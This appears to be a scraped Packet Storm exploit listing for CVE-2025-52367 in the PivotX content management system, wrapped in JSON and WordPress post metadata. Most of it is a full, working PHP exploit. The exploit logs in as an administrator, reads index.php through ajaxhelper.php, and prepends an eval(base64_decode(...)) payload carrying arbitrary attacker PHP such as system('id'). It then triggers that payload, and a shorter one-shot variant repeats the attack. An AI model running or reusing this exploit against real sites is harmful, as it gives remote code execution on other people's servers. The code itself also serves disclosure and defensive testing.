{“lastseen”:”2026-02-16T17:14:20″,”description”:”PivotX content management system versions up to and including 3.0.0-rc3 contain an authenticated remote code execution vulnerability that allows administrative users to modify PHP files directly through the web interface, leading to complete system…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 PivotX 3.0.0 RC 3 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:215634″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-52367″],”sourceData”:”=============================================================================================================================================\\n | # Title : PivotX 3.0.0 RC 3 authenticated command injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/github.com\/pivotx\/PivotX |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/208387\/ \\u0026 \\tCVE-2025-52367\\n \\n [+] Summary : \\n PivotX content management system versions up to and including 3.0.0-rc3 contain an authenticated remote code execution vulnerability \\n \\t\\t\\t that allows administrative users to modify PHP files directly through the web interface, leading to complete system compromise.\\n \\t\\t\\t \\n [+] POC : \\n \\n php poc.php \\n \\n \\u003c?php\\n \\n class PivotX_RCE_Exploit {\\n \\n private $target;\\n private $username;\\n private $password;\\n private $base_uri;\\n private $cookies;\\n private $csrf_token;\\n private $base_dir;\\n private $original_content;\\n \\n public function __construct($target, $username, $password, $base_uri = ‘\/PivotX\/’) {\\n $this-\\u003etarget = rtrim($target, ‘\/’);\\n $this-\\u003eusername = $username;\\n $this-\\u003epassword = $password;\\n $this-\\u003ebase_uri = rtrim($base_uri, ‘\/’);\\n $this-\\u003ecookies = [];\\n $this-\\u003ecsrf_token = null;\\n $this-\\u003ebase_dir = null;\\n $this-\\u003eoriginal_content = null;\\n }\\n \\n private function send_request($method, $endpoint, $data = null, $is_post = false, $is_multipart = false) {\\n $url = $this-\\u003etarget . $this-\\u003ebase_uri . $endpoint;\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e 30,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_COOKIEFILE =\\u003e ”,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false\\n ]);\\n \\n \/\/ Preserve cookies between requests\\n if (!empty($this-\\u003ecookies)) {\\n curl_setopt($ch, CURLOPT_COOKIE, $this-\\u003ebuild_cookie_header());\\n }\\n \\n if ($is_post) {\\n curl_setopt($ch, CURLOPT_POST, true);\\n if ($data) {\\n if ($is_multipart) {\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\\n curl_setopt($ch, CURLOPT_HTTPHEADER, [‘Content-Type: multipart\/form-data; boundary=’ . $this-\\u003egenerate_boundary()]);\\n } else {\\n curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));\\n }\\n }\\n } else {\\n if ($data \\u0026\\u0026 !$is_post) {\\n $url .= ‘?’ . http_build_query($data);\\n curl_setopt($ch, CURLOPT_URL, $url);\\n }\\n }\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n \/\/ Save cookies from response\\n if (preg_match_all(‘\/Set-Cookie:\\\\s*([^;]+)\/i’, $response, $matches)) {\\n foreach ($matches[1] as $cookie) {\\n $parts = explode(‘=’, $cookie, 2);\\n if (count($parts) === 2) {\\n $this-\\u003ecookies[$parts[0]] = $parts[1];\\n }\\n }\\n }\\n \\n \/\/ Extract pivotxsession cookie for CSRF token\\n if (preg_match(‘\/pivotxsession=([a-zA-Z0-9]+)\/’, $this-\\u003ebuild_cookie_header(), $matches)) {\\n $this-\\u003ecsrf_token = $matches[1];\\n }\\n \\n curl_close($ch);\\n \\n return [\\n ‘code’ =\\u003e $http_code,\\n ‘body’ =\\u003e $response\\n ];\\n }\\n \\n private function build_cookie_header() {\\n $cookies = [];\\n foreach ($this-\\u003ecookies as $name =\\u003e $value) {\\n $cookies[] = $name . ‘=’ . $value;\\n }\\n return implode(‘; ‘, $cookies);\\n }\\n \\n private function generate_boundary() {\\n return ‘—-WebKitFormBoundary’ . bin2hex(random_bytes(16));\\n }\\n \\n private function build_multipart_data($fields) {\\n $boundary = $this-\\u003egenerate_boundary();\\n $data = ”;\\n \\n foreach ($fields as $name =\\u003e $value) {\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”{$name}\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”{$value}\\\\r\\\\n\\”;\\n }\\n \\n $data .= \\”–{$boundary}–\\\\r\\\\n\\”;\\n \\n return [\\n ‘data’ =\\u003e $data,\\n ‘boundary’ =\\u003e $boundary\\n ];\\n }\\n \\n public function check() {\\n echo \\”[*] Checking target…\\\\n\\”;\\n \\n $response = $this-\\u003esend_request(‘GET’, ‘pivotx\/index.php’);\\n \\n if ($response[‘code’] !== 200) {\\n return \\”Unknown: Unexpected response code: \\” . $response[‘code’];\\n }\\n \\n if (strpos($response[‘body’], ‘PivotX Powered’) === false) {\\n return \\”Safe: Target is not PivotX\\”;\\n }\\n \\n \/\/ Extract version\\n if (preg_match(‘\/PivotX – (\\\\d\\\\.\\\\d\\\\d?\\\\.\\\\d\\\\d?-[a-z0-9]+)\/’, $response[‘body’], $matches)) {\\n $version = $matches[1];\\n echo \\”[*] Detected PivotX version: $version\\\\n\\”;\\n \\n \/\/ Check if version is vulnerable (\\u003c= 3.0.0-rc3)\\n if (version_compare($version, ‘3.0.0-rc3’, ‘\\u003c=’)) {\\n return \\”Appears: Vulnerable PivotX $version detected\\”;\\n } else {\\n return \\”Safe: PivotX $version is not vulnerable\\”;\\n }\\n }\\n \\n return \\”Detected: Could not determine version\\”;\\n }\\n \\n private function login() {\\n echo \\”[*] Attempting to login…\\\\n\\”;\\n \\n $multipart_data = $this-\\u003ebuild_multipart_data([\\n ‘returnto’ =\\u003e ”,\\n ‘template’ =\\u003e ”,\\n ‘username’ =\\u003e $this-\\u003eusername,\\n ‘password’ =\\u003e $this-\\u003epassword\\n ]);\\n \\n $response = $this-\\u003esend_request(‘POST’, ‘pivotx\/index.php’, \\n array_merge([‘page’ =\\u003e ‘login’], $multipart_data[‘data’]), \\n true, true);\\n \\n \/\/ Check for login failure\\n if (strpos($response[‘body’], ‘Incorrect username\/password’) !== false) {\\n throw new Exception(\\”Login failed – incorrect username\/password\\”);\\n }\\n \\n \/\/ Check for successful login (should have pivotxsession cookie)\\n if (($response[‘code’] == 200 || $response[‘code’] == 302) \\u0026\\u0026 \\n preg_match(‘\/pivotxsession=([a-zA-Z0-9]+)\/’, $this-\\u003ebuild_cookie_header())) {\\n echo \\”[+] Login successful\\\\n\\”;\\n return true;\\n }\\n \\n throw new Exception(\\”Login failed – unable to get pivotxsession cookie\\”);\\n }\\n \\n private function modify_file($payload) {\\n echo \\”[*] Modifying index.php file…\\\\n\\”;\\n \\n \/\/ First, get the working directory\\n $response = $this-\\u003esend_request(‘GET’, ‘pivotx\/index.php’, [‘page’ =\\u003e ‘homeexplore’]);\\n \\n if ($response[‘code’] !== 200 || !preg_match(‘\/basedir=([a-zA-Z0-9]+)\/’, $response[‘body’], $matches)) {\\n throw new Exception(\\”Failed to fetch working directory\\”);\\n }\\n \\n $this-\\u003ebase_dir = $matches[1];\\n echo \\”[*] Base directory: $this-\\u003ebase_dir\\\\n\\”;\\n \\n \/\/ Fetch current index.php content\\n $response = $this-\\u003esend_request(‘GET’, ‘pivotx\/ajaxhelper.php’, [\\n ‘function’ =\\u003e ‘view’,\\n ‘basedir’ =\\u003e $this-\\u003ebase_dir,\\n ‘file’ =\\u003e ‘index.php’\\n ]);\\n \\n if ($response[‘code’] !== 200) {\\n throw new Exception(\\”Failed to fetch index.php content\\”);\\n }\\n \\n \/\/ Extract original content from textarea\\n if (preg_match(‘\/\\u003ctextarea[^\\u003e]*\\u003e(.*?)\\u003c\\\\\/textarea\\u003e\/is’, $response[‘body’], $matches)) {\\n $this-\\u003eoriginal_content = html_entity_decode($matches[1]);\\n }\\n \\n if (!$this-\\u003eoriginal_content) {\\n throw new Exception(\\”Could not find content of index.php\\”);\\n }\\n \\n echo \\”[*] Original content length: \\” . strlen($this-\\u003eoriginal_content) . \\” bytes\\\\n\\”;\\n \\n \/\/ Create malicious payload\\n $encoded_payload = base64_encode($payload);\\n $malicious_content = \\”\\u003c?php eval(base64_decode(‘$encoded_payload’)); ?\\u003e \\” . $this-\\u003eoriginal_content;\\n \\n \/\/ Save malicious content\\n $post_data = [\\n ‘csrfcheck’ =\\u003e $this-\\u003ecsrf_token,\\n ‘function’ =\\u003e ‘save’,\\n ‘basedir’ =\\u003e $this-\\u003ebase_dir,\\n ‘file’ =\\u003e ‘index.php’,\\n ‘contents’ =\\u003e $malicious_content\\n ];\\n \\n $response = $this-\\u003esend_request(‘POST’, ‘pivotx\/ajaxhelper.php’, $post_data, true);\\n \\n if ($response[‘code’] !== 200 || strpos($response[‘body’], ‘Wrote contents to file index.php’) === false) {\\n throw new Exception(\\”Failed to insert malicious PHP payload\\”);\\n }\\n \\n echo \\”[+] Successfully modified index.php with payload\\\\n\\”;\\n }\\n \\n private function trigger_payload() {\\n echo \\”[*] Triggering payload…\\\\n\\”;\\n \\n $response = $this-\\u003esend_request(‘POST’, ‘index.php’, null, true);\\n \\n echo \\”[+] Payload triggered\\\\n\\”;\\n return $response;\\n }\\n \\n private function restore() {\\n if (!$this-\\u003eoriginal_content || !$this-\\u003ebase_dir || !$this-\\u003ecsrf_token) {\\n echo \\”[-] Cannot restore – missing required data\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[*] Restoring original content…\\\\n\\”;\\n \\n $post_data = [\\n ‘csrfcheck’ =\\u003e $this-\\u003ecsrf_token,\\n ‘function’ =\\u003e ‘save’,\\n ‘basedir’ =\\u003e $this-\\u003ebase_dir,\\n ‘file’ =\\u003e ‘index.php’,\\n ‘contents’ =\\u003e $this-\\u003eoriginal_content\\n ];\\n \\n $response = $this-\\u003esend_request(‘POST’, ‘pivotx\/ajaxhelper.php’, $post_data, true);\\n \\n if ($response[‘code’] === 200 \\u0026\\u0026 strpos($response[‘body’], ‘Wrote contents to file index.php’) !== false) {\\n echo \\”[+] Original content restored successfully\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Failed to restore original content\\\\n\\”;\\n return false;\\n }\\n }\\n \\n public function exploit($payload) {\\n try {\\n echo \\”[*] Starting PivotX RCE exploitation…\\\\n\\”;\\n \\n \/\/ Check target first\\n $check_result = $this-\\u003echeck();\\n echo \\”[*] Check result: $check_result\\\\n\\”;\\n \\n if (strpos($check_result, ‘Safe’) !== false) {\\n echo \\”[-] Target is not vulnerable, stopping exploitation\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Login to PivotX\\n $this-\\u003elogin();\\n \\n \/\/ Modify index.php with payload\\n $this-\\u003emodify_file($payload);\\n \\n \/\/ Trigger the payload\\n $this-\\u003etrigger_payload();\\n \\n echo \\”[+] Exploitation completed\\\\n\\”;\\n return true;\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploitation failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n return false;\\n } finally {\\n \/\/ Always attempt to restore original content\\n $this-\\u003erestore();\\n }\\n }\\n \\n public function __destruct() {\\n \/\/ Auto-restore on object destruction\\n $this-\\u003erestore();\\n }\\n }\\n \\n \/\/ \u0646\u0633\u062e\u0629 \u0645\u0628\u0633\u0637\u0629 \u0644\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0633\u0631\u064a\u0639\\n class SimplePivotXExploit {\\n \\n public static function execute($target, $username, $password, $php_code, $base_uri = ‘\/PivotX\/’) {\\n $target = rtrim($target, ‘\/’);\\n $base_uri = rtrim($base_uri, ‘\/’);\\n \\n $ch = curl_init();\\n $cookies = [];\\n \\n \/\/ Step 1: Login\\n $login_data = http_build_query([\\n ‘returnto’ =\\u003e ”,\\n ‘template’ =\\u003e ”,\\n ‘username’ =\\u003e $username,\\n ‘password’ =\\u003e $password\\n ]);\\n \\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $target . $base_uri . ‘\/pivotx\/index.php?page=login’,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e $login_data,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_COOKIEFILE =\\u003e ”,\\n CURLOPT_FOLLOWLOCATION =\\u003e true\\n ]);\\n \\n $response = curl_exec($ch);\\n \\n \/\/ Extract cookies\\n if (preg_match_all(‘\/Set-Cookie:\\\\s*([^;]+)\/i’, $response, $matches)) {\\n foreach ($matches[1] as $cookie) {\\n $parts = explode(‘=’, $cookie, 2);\\n if (count($parts) === 2) {\\n $cookies[$parts[0]] = $parts[1];\\n }\\n }\\n }\\n \\n $cookie_header = ”;\\n foreach ($cookies as $name =\\u003e $value) {\\n $cookie_header .= $name . ‘=’ . $value . ‘; ‘;\\n }\\n \\n \/\/ Step 2: Get base directory\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $target . $base_uri . ‘\/pivotx\/index.php?page=homeexplore’,\\n CURLOPT_POST =\\u003e false,\\n CURLOPT_HTTPHEADER =\\u003e [\\”Cookie: $cookie_header\\”]\\n ]);\\n \\n $response = curl_exec($ch);\\n preg_match(‘\/basedir=([a-zA-Z0-9]+)\/’, $response, $matches);\\n $base_dir = $matches[1] ?? ”;\\n \\n if (!$base_dir) {\\n return \\”[-] Failed to get base directory\\”;\\n }\\n \\n \/\/ Step 3: Get original index.php content\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $target . $base_uri . ‘\/pivotx\/ajaxhelper.php?function=view\\u0026basedir=’ . $base_dir . ‘\\u0026file=index.php’,\\n CURLOPT_HTTPHEADER =\\u003e [\\”Cookie: $cookie_header\\”]\\n ]);\\n \\n $response = curl_exec($ch);\\n preg_match(‘\/\\u003ctextarea[^\\u003e]*\\u003e(.*?)\\u003c\\\\\/textarea\\u003e\/is’, $response, $matches);\\n $original_content = html_entity_decode($matches[1] ?? ”);\\n \\n \/\/ Step 4: Inject payload\\n $encoded_payload = base64_encode($php_code);\\n $malicious_content = \\”\\u003c?php eval(base64_decode(‘$encoded_payload’)); ?\\u003e \\” . $original_content;\\n \\n $post_data = http_build_query([\\n ‘csrfcheck’ =\\u003e $cookies[‘pivotxsession’] ?? ”,\\n ‘function’ =\\u003e ‘save’,\\n ‘basedir’ =\\u003e $base_dir,\\n ‘file’ =\\u003e ‘index.php’,\\n ‘contents’ =\\u003e $malicious_content\\n ]);\\n \\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $target . $base_uri . ‘\/pivotx\/ajaxhelper.php’,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e $post_data,\\n CURLOPT_HTTPHEADER =\\u003e [\\”Cookie: $cookie_header\\”]\\n ]);\\n \\n $response = curl_exec($ch);\\n \\n \/\/ Step 5: Trigger payload\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $target . $base_uri . ‘\/index.php’,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e ”,\\n CURLOPT_HTTPHEADER =\\u003e [\\”Cookie: $cookie_header\\”]\\n ]);\\n \\n $trigger_response = curl_exec($ch);\\n \\n \/\/ Step 6: Restore original content\\n $restore_data = http_build_query([\\n ‘csrfcheck’ =\\u003e $cookies[‘pivotxsession’] ?? ”,\\n ‘function’ =\\u003e ‘save’,\\n ‘basedir’ =\\u003e $base_dir,\\n ‘file’ =\\u003e ‘index.php’,\\n ‘contents’ =\\u003e $original_content\\n ]);\\n \\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $target . $base_uri . ‘\/pivotx\/ajaxhelper.php’,\\n CURLOPT_POSTFIELDS =\\u003e $restore_data\\n ]);\\n \\n curl_exec($ch);\\n curl_close($ch);\\n \\n return \\”[+] Exploitation completed\\”;\\n }\\n }\\n \\n \/\/ \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645\\n if (php_sapi_name() === ‘cli’) {\\n \\n if ($argc \\u003c 5) {\\n echo \\”Usage: php \\” . $argv[0] . \\” \\u003ctarget_url\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e \\u003cphp_code\\u003e\\\\n\\”;\\n echo \\”Example: php \\” . $argv[0] . \\” http:\/\/localhost admin password \\\\\\”system(‘id’);\\\\\\”\\\\n\\”;\\n echo \\”Example: php \\” . $argv[0] . \\” http:\/\/localhost admin password \\\\\\”echo ‘Hello World’;\\\\\\”\\\\n\\”;\\n exit(1);\\n }\\n \\n $target = $argv[1];\\n $username = $argv[2];\\n $password = $argv[3];\\n $php_code = $argv[4];\\n \\n \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0646\u0633\u062e\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629\\n $exploit = new PivotX_RCE_Exploit($target, $username, $password);\\n $exploit-\\u003eexploit($php_code);\\n \\n \/\/ \u0623\u0648 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0646\u0633\u062e\u0629 \u0627\u0644\u0645\u0628\u0633\u0637\u0629\\n \/\/ $result = SimplePivotXExploit::execute($target, $username, $password, $php_code);\\n \/\/ echo $result . \\”\\\\n\\”;\\n }\\n \\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215634″,”cvss”:{“score”:5.4,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:C\/C:L\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215634\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-16T17:14:20″,”description”:”PivotX content management system versions up to and including 3.0.0-rc3 contain an authenticated remote code execution vulnerability that allows administrative users to modify PHP files…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,82,12,21,13,53,7,11,5],"class_list":["post-41047","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-54","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n